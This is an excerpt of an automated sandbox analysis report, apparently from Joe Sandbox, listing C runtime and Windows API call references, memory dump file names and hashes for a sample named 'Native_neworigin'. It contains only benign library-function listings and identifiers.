• Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
• Opcode Fuzzy Hash: 3d09e5343aa18fab3ca4e2e74db44cf1cccdb49efdd84c094ede33f31d65ba6e
• Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98
APIs
• ___free_lconv_mon.LIBCMT ref: 00862543
  • Part of subcall function 00863073: _free.LIBCMT ref: 00863090
  • Part of subcall function 00863073: _free.LIBCMT ref: 008630A2
  • Part of subcall function 00863073: _free.LIBCMT ref: 008630B4
  • Part of subcall function 00863073: _free.LIBCMT ref: 008630C6
  • Part of subcall function 00863073: _free.LIBCMT ref: 008630D8
  • Part of subcall function 00863073: _free.LIBCMT ref: 008630EA
  • Part of subcall function 00863073: _free.LIBCMT ref: 008630FC
  • Part of subcall function 00863073: _free.LIBCMT ref: 0086310E
  • Part of subcall function 00863073: _free.LIBCMT ref: 00863120
  • Part of subcall function 00863073: _free.LIBCMT ref: 00863132
  • Part of subcall function 00863073: _free.LIBCMT ref: 00863144
  • Part of subcall function 00863073: _free.LIBCMT ref: 00863156
  • Part of subcall function 00863073: _free.LIBCMT ref: 00863168
• _free.LIBCMT ref: 00862538
  • Part of subcall function 00862096: HeapFree.KERNEL32(00000000,00000000,?,00863208,?,00000000,?,00000000,?,0086322F,?,00000007,?,?,00862697,?), ref: 008620AC
  • Part of subcall function 00862096: GetLastError.KERNEL32(?,?,00863208,?,00000000,?,00000000,?,0086322F,?,00000007,?,?,00862697,?,?), ref: 008620BE
• _free.LIBCMT ref: 0086255A
• _free.LIBCMT ref: 0086256F
• _free.LIBCMT ref: 0086257A
• _free.LIBCMT ref: 0086259C
• _free.LIBCMT ref: 008625AF
• _free.LIBCMT ref: 008625BD
• _free.LIBCMT ref: 008625C8
• _free.LIBCMT ref: 00862600
• _free.LIBCMT ref: 00862607
• _free.LIBCMT ref: 00862624
• _free.LIBCMT ref: 0086263C
Memory Dump Source
• Source File: 00000009.00000002.2396960520.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_820000_Native_neworigin.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast___free_lconv_mon
• String ID:
• API String ID: 161543041-0
• Opcode ID: 88a1f0fd727e3be598799670a57fc0f2ec0dcec3126062d7dd5f0723e33bc3e7
• Instruction ID: cd231dd4c2690d1e20ca772d3aa7d5192439ca2ebc8c72d3f36b7795347bb40f
• Opcode Fuzzy Hash: 88a1f0fd727e3be598799670a57fc0f2ec0dcec3126062d7dd5f0723e33bc3e7
• Instruction Fuzzy Hash: 1C318D71A00F029FEB31AA78D809B56B3E8FF10311F1258A9E45AD71A1DF71ED80CB52
APIs
• _malloc.LIBCMT ref: 004057DE
  • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
  • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
  • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
• _malloc.LIBCMT ref: 00405842
• _malloc.LIBCMT ref: 00405906
• _malloc.LIBCMT ref: 00405930
Strings
Memory Dump Source
• Source File: 00000009.00000002.2396597881.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.2396561892.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396630294.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396656156.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396683576.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396683576.000000000044C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396798482.000000000055F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_400000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: _malloc$AllocateHeap
                                                                                                                                                                                                                                                                                                                                  • String ID: 1.2.3
                                                                                                                                                                                                                                                                                                                                  • API String ID: 680241177-2310465506
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 1371ffb49ce3b8dee1113081a69af0fad64233f45308895947edc3c59a7df708
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1371ffb49ce3b8dee1113081a69af0fad64233f45308895947edc3c59a7df708
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A
APIs
Memory Dump Source
• Source File: 00000009.00000002.2396597881.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.2396561892.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000009.00000002.2396630294.000000000041B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000009.00000002.2396656156.0000000000422000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000009.00000002.2396683576.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
• Associated: 00000009.00000002.2396683576.000000000044C000.00000040.00000001.01000000.0000000A.sdmp
• Associated: 00000009.00000002.2396798482.000000000055F000.00000040.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_Native_neworigin.jbxd
Similarity
• API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
• String ID:
• API String ID: 3886058894-0
• Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
• Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
• Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
• Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD
APIs
• GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00868311,?,00000000,?,00000000,00000000), ref: 00867BDE
• __fassign.LIBCMT ref: 00867C59
• __fassign.LIBCMT ref: 00867C74
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00867C9A
• WriteFile.KERNEL32(?,?,00000000,00868311,00000000,?,?,?,?,?,?,?,?,?,00868311,?), ref: 00867CB9
• WriteFile.KERNEL32(?,?,00000001,00868311,00000000,?,?,?,?,?,?,?,?,?,00868311,?), ref: 00867CF2
Memory Dump Source
• Source File: 00000009.00000002.2396960520.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_820000_Native_neworigin.jbxd
Similarity
• API ID: FileWrite__fassign$ByteCharConsoleMultiWide
• String ID:
• API String ID: 1324828854-0
• Opcode ID: b11964943c2d09e10d41188a0efc1be814fe6bd283203cbbcddac1930a97d792
• Instruction ID: dea4ab4c838a6f66f3c68c6698c625f6f1054ef2f71743a65bc6f5120f6373c7
• Opcode Fuzzy Hash: b11964943c2d09e10d41188a0efc1be814fe6bd283203cbbcddac1930a97d792
• Instruction Fuzzy Hash: 4951D3B0A042099FDB10CFA8DC85AEEBBF8FF09314F15455AE955E7291E730A941CFA1
APIs
  • Part of subcall function 008631DA: _free.LIBCMT ref: 00863203
• _free.LIBCMT ref: 00863264
  • Part of subcall function 00862096: HeapFree.KERNEL32(00000000,00000000,?,00863208,?,00000000,?,00000000,?,0086322F,?,00000007,?,?,00862697,?), ref: 008620AC
  • Part of subcall function 00862096: GetLastError.KERNEL32(?,?,00863208,?,00000000,?,00000000,?,0086322F,?,00000007,?,?,00862697,?,?), ref: 008620BE
• _free.LIBCMT ref: 0086326F
• _free.LIBCMT ref: 0086327A
• _free.LIBCMT ref: 008632CE
• _free.LIBCMT ref: 008632D9
• _free.LIBCMT ref: 008632E4
• _free.LIBCMT ref: 008632EF
Memory Dump Source
• Source File: 00000009.00000002.2396960520.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_820000_Native_neworigin.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: fcd263e1e97f9626aa0bdc167c26919d6134e182e28646451650430cd4015995
• Instruction ID: dc03894d800f27ef7f734f4b4aca22fb3394c9b571302ed2028ae92fd44c9b5a
• Opcode Fuzzy Hash: fcd263e1e97f9626aa0bdc167c26919d6134e182e28646451650430cd4015995
• Instruction Fuzzy Hash: D011EC72A40F04AAD630FBB8CC47FCB779DFF06701F424815BA9EE6152DA65B6048693
APIs
• __lock_file.LIBCMT ref: 0040C6C8
• __fileno.LIBCMT ref: 0040C6D6
• __fileno.LIBCMT ref: 0040C6E2
• __fileno.LIBCMT ref: 0040C6EE
• __fileno.LIBCMT ref: 0040C6FE
  • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
  • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
Strings
Memory Dump Source
• Source File: 00000009.00000002.2396597881.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.2396561892.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000009.00000002.2396630294.000000000041B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000009.00000002.2396656156.0000000000422000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000009.00000002.2396683576.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
• Associated: 00000009.00000002.2396683576.000000000044C000.00000040.00000001.01000000.0000000A.sdmp
• Associated: 00000009.00000002.2396798482.000000000055F000.00000040.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_Native_neworigin.jbxd
Similarity
• API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
• String ID: 'B
• API String ID: 2805327698-2787509829
APIs
• MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,0086473A,?,?,00000000), ref: 00864543
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,0086473A,?,?,00000000,?,?,?), ref: 008645C9
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 008646C3
• __freea.LIBCMT ref: 008646D0
  • Part of subcall function 008632FA: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 0086332C
• __freea.LIBCMT ref: 008646D9
• __freea.LIBCMT ref: 008646FE
Memory Dump Source
• Source File: 00000009.00000002.2396960520.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_820000_Native_neworigin.jbxd
Similarity
• API ID: ByteCharMultiWide__freea$AllocateHeap
• String ID:
• API String ID: 1414292761-0
APIs
Memory Dump Source
• Source File: 00000009.00000002.2396960520.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_820000_Native_neworigin.jbxd
Similarity
• API ID: ErrorLast$_free$_abort
• String ID:
• API String ID: 3160817290-0
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00863F73,00000003,?,00863F13,00000003,0087DE80,0000000C,0086403D,00000003,00000002), ref: 00863FE2
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00863FF5
• FreeLibrary.KERNEL32(00000000,?,?,?,00863F73,00000003,?,00863F13,00000003,0087DE80,0000000C,0086403D,00000003,00000002,00000000), ref: 00864018
Strings
Memory Dump Source
• Source File: 00000009.00000002.2396960520.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_820000_Native_neworigin.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
APIs
• __getptd.LIBCMT ref: 00414744
  • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
  • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
• __getptd.LIBCMT ref: 0041475B
• __amsg_exit.LIBCMT ref: 00414769
• __lock.LIBCMT ref: 00414779
Strings
Memory Dump Source
• Source File: 00000009.00000002.2396597881.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.2396561892.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000009.00000002.2396630294.000000000041B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000009.00000002.2396656156.0000000000422000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000009.00000002.2396683576.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396683576.000000000044C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396798482.000000000055F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_400000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                                                                                                                                                                                                                  • String ID: @.B
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3521780317-470711618
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000008,?,?,008615D8,00863CBB,?,00861D2A,?,?,00000000), ref: 008618E4
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00861919
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00861940
                                                                                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,00861D2A,?,?,00000000), ref: 0086194D
                                                                                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,00861D2A,?,?,00000000), ref: 00861956
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2396960520.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_820000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3170660625-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 6ea50eebfd83ed598f3e5e8193e46fa21e5f49c51ea42f789a2e125cf1ca019a
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 9d933050a899c220c6c12e122757954b3dc8e56fc5c160a64cf2b6e30ad24f65
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6ea50eebfd83ed598f3e5e8193e46fa21e5f49c51ea42f789a2e125cf1ca019a
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DA014933100E026B9B1267396C9D92B1A1DFBC237876B0024F905F2253FE6288414423
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • __getptd.LIBCMT ref: 00413FD8
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                                                                                                                                                                                                                                  • __amsg_exit.LIBCMT ref: 00413FF8
                                                                                                                                                                                                                                                                                                                                  • __lock.LIBCMT ref: 00414008
                                                                                                                                                                                                                                                                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 00414025
                                                                                                                                                                                                                                                                                                                                  • InterlockedIncrement.KERNEL32(02BD1670), ref: 00414050
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2396597881.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396561892.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396630294.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396656156.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396683576.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396683576.000000000044C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396798482.000000000055F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_400000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 4271482742-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00863189
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00862096: HeapFree.KERNEL32(00000000,00000000,?,00863208,?,00000000,?,00000000,?,0086322F,?,00000007,?,?,00862697,?), ref: 008620AC
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00862096: GetLastError.KERNEL32(?,?,00863208,?,00000000,?,00000000,?,0086322F,?,00000007,?,?,00862697,?,?), ref: 008620BE
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0086319B
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 008631AD
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 008631BF
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 008631D1
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2396960520.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_820000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: cf062f7ae5650ccc6f8d34f9c904a30558b88544c11f6ebb6589040d8d9048fb
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 0514d0235a0cd3cc52bf9786c224c2849b11d7bea10c10e7704cb58db8154c70
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cf062f7ae5650ccc6f8d34f9c904a30558b88544c11f6ebb6589040d8d9048fb
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 54F01D32A44B01ABC674EB6CF986C1A73D9FE057157661849F54AE7601CB30FD808FA5
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2396597881.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396561892.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396630294.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396656156.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396683576.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396683576.000000000044C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396798482.000000000055F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_400000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: __calloc_crt
                                                                                                                                                                                                                                                                                                                                  • String ID: P$B$`$B
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3494438863-235554963
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: fdf4f6b62053dea64867d0c1085960dee66dbdb5e7cbac4bce55836661d1e8cf
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 4bdca0f49684ef71ac3198dcc3f656e5d5ce7fed137673697bf40858e87bd1f9
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fdf4f6b62053dea64867d0c1085960dee66dbdb5e7cbac4bce55836661d1e8cf
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6011A3327446115BE7348B1DBD50F662391EB84728BA4423BE619EA7E0E77CD8864A4C
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2396597881.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396561892.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396630294.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396656156.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396683576.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396683576.000000000044C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396798482.000000000055F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_400000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                                                                                                  • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1646373207-3105848591
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • ___addlocaleref.LIBCMT ref: 0041470C
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(00000001), ref: 004145E4
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 004145F1
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 004145FE
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 0041460B
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 00414618
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 00414634
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 00414644
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 0041465A
                                                                                                                                                                                                                                                                                                                                  • ___removelocaleref.LIBCMT ref: 00414717
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 0041467B
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 00414688
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 00414695
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 004146A2
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 004146AF
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 004146CB
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(00000000), ref: 004146DB
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 004146F1
                                                                                                                                                                                                                                                                                                                                  • ___freetlocinfo.LIBCMT ref: 0041472B
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414489: ___free_lconv_mon.LIBCMT ref: 004144CF
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414489: ___free_lconv_num.LIBCMT ref: 004144F0
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414489: ___free_lc_time.LIBCMT ref: 00414575
